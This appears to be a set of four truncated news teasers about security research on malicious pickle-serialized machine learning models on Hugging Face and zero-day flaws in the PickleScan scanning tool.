Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization. The method focuses on the "pickling" process used to ...
Researchers have discovered about 100 machine learning (ML) models that have been uploaded to the Hugging Face artificial intelligence (AI) platform and potentially enable attackers to inject ...
Three critical zero-day vulnerabilities affecting PickleScan, a widely used tool for scanning Python pickle files and PyTorch models, have been uncovered by cybersecurity researchers. The flaws, all ...
IT researchers have discovered malicious ML models on the Hugging Face AI development platform. Attackers could use them to infiltrate commands. IT researchers have discovered maliciously manipulated ...